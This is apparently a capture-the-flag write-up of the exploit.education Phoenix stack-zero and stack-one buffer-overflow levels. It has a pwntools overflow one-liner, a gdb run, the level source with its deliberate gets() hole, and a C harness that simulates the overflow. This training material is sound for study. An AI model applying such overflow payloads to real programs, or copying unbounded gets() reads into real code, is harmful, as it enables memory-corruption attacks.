```
user@phoenix-amd64:~$ python -c "import pwn;print 'A'*64+pwn.p64(0x496c5962)" | xargs /opt/phoenix/amd64/stack-one
xargs: WARNING: a NUL character occurred in the input.  It cannot be passed through in the argument list.  Did you mean to use the --null option?
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
```

The xargs warning is harmless here. p64() packs 0x496c5962 as eight little-endian bytes, 62 59 6c 49 00 00 00 00, and an argv entry is a C string, so the four trailing zero bytes cannot be passed through and are dropped. The first four bytes ("bYlI") are all the level needs, which is why the same string typed directly as the argument in gdb also works.

```
gef➤ set args AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI
gef➤ run
Starting program: /opt/phoenix/amd64/stack-one AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
[Inferior 1 (process 9363) exited normally]
```

Steps

```c
/*
 * phoenix/stack-zero, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable.
 *
 * Scientists have recently discovered a previously unknown species of
 * kangaroos, approximately in the middle of Western Australia. These
 * kangaroos are remarkable, as their insanely powerful hind legs give them
 * the ability to jump higher than a one story house (which is approximately
 * 15 feet, or 4.5 metres), simply because houses can't can't jump.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  locals.changeme = 0;
  gets(locals.buffer);

  if (locals.changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed!");
  } else {
    puts("Uh oh, 'changeme' has not yet been changed. Would you like to try "
         "again?");
  }

  exit(0);
}
```

```
$ man gets
...
DESCRIPTION
     ...
     The gets() function is equivalent to fgets() with an infinite size and a
     stream of stdin, except that the newline character (if any) is not stored
     in the string.  It is the caller's responsibility to ensure that the input
     line, if any, is sufficiently short to fit in the string.
...
SECURITY CONSIDERATIONS
     The gets() function cannot be used securely.  Because of its lack of
     bounds checking, and the inability for the calling program to reliably
     determine the length of the next incoming line, the use of this function
     enables malicious users to arbitrarily change a running program's
     functionality through a buffer overflow attack.  It is strongly suggested
     that the fgets() function be used in all cases.  (See the FSA.)
```
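Putting the two levels together: stack-zero only needs some byte to spill past buffer[64] into changeme, while stack-one needs the four bytes that spell 0x496c5962 in little-endian order, which is what the pwntools p64() call and the `bYlI` argument in the transcripts above provide. The C harness below is an added example, not code from exploit.education or from this writeup. It mirrors the struct layout (64-byte buffer immediately followed by the int), packs the value the way p32()/p64() would, shows why the NUL warning from xargs is harmless (an argv entry ends at its first NUL), and simulates the unbounded copy with the write capped at the struct's own size so the harness stays well-defined. It assumes a little-endian host with a 4-byte int, like the amd64 target; `build_payload`, `argv_visible_len` and `overflow_changeme` are names chosen for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Same layout as the locals struct in the phoenix stack levels: 64 bytes of
 * buffer immediately followed by the int we want to clobber (offset 64). */
struct locals {
    char buffer[64];
    volatile int changeme;
};

/* Value stack-one compares changeme against (see the transcripts above). */
#define TARGET 0x496c5962u

/* Little-endian packing, the same thing pwntools p32()/p64() do:
 * width 4 mimics p32(), width 8 mimics p64(). Assumes the target is
 * little-endian, as amd64 is. */
static void pack_le(uint64_t v, unsigned char *out, size_t width)
{
    for (size_t i = 0; i < width; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}

/* Build 64 filler bytes followed by TARGET packed little-endian.
 * Returns the payload length, or 0 if the caller's buffer is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t width)
{
    if (width > 8 || cap < 64 + width)
        return 0;
    memset(out, 'A', 64);
    pack_le(TARGET, out + 64, width);
    return 64 + width;
}

/* Number of payload bytes that can actually travel through argv: an argv
 * entry is a C string, so the first NUL ends it. With p64() the upper four
 * bytes of the packed value are zero, which is exactly what xargs warned
 * about; with p32() nothing is lost. */
size_t argv_visible_len(const unsigned char *payload, size_t len)
{
    size_t n = 0;
    while (n < len && payload[n] != '\0')
        n++;
    return n;
}

/* Simulate the level's unbounded copy into locals.buffer. A real strcpy or
 * gets() keeps writing past the struct; here the write is capped at
 * sizeof(struct locals) so this harness itself stays well-defined, which is
 * enough to show bytes 64..67 of the payload landing in changeme. */
int overflow_changeme(const unsigned char *payload, size_t len)
{
    struct locals locals;
    size_t n = argv_visible_len(payload, len);   /* strcpy stops at NUL */

    locals.changeme = 0;
    if (n > sizeof locals)
        n = sizeof locals;
    memcpy(&locals, payload, n);                 /* buffer first, then changeme */
    return locals.changeme;
}

int main(void)
{
    unsigned char pl32[80], pl64[80], zero[65];
    size_t n32 = build_payload(pl32, sizeof pl32, 4);
    size_t n64 = build_payload(pl64, sizeof pl64, 8);

    /* stack-zero style: one byte past the buffer is enough */
    memset(zero, 'A', sizeof zero);
    printf("65 x 'A': changeme = 0x%x\n",
           (unsigned)overflow_changeme(zero, sizeof zero));
    printf("p32 payload: %zu bytes, changeme = 0x%x\n", n32,
           (unsigned)overflow_changeme(pl32, n32));
    printf("p64 payload: %zu bytes, %zu survive argv, changeme = 0x%x\n", n64,
           argv_visible_len(pl64, n64), (unsigned)overflow_changeme(pl64, n64));
    return 0;
}
```

Compile with `cc harness.c -o harness` and run it. The 65-byte case ends up with changeme == 0x41 because only the low byte is overwritten and the rest keeps the zero the level initialised it with; both packed payloads yield 0x496c5962, and the p64 variant shows that only 68 of its 72 bytes would make it through argv.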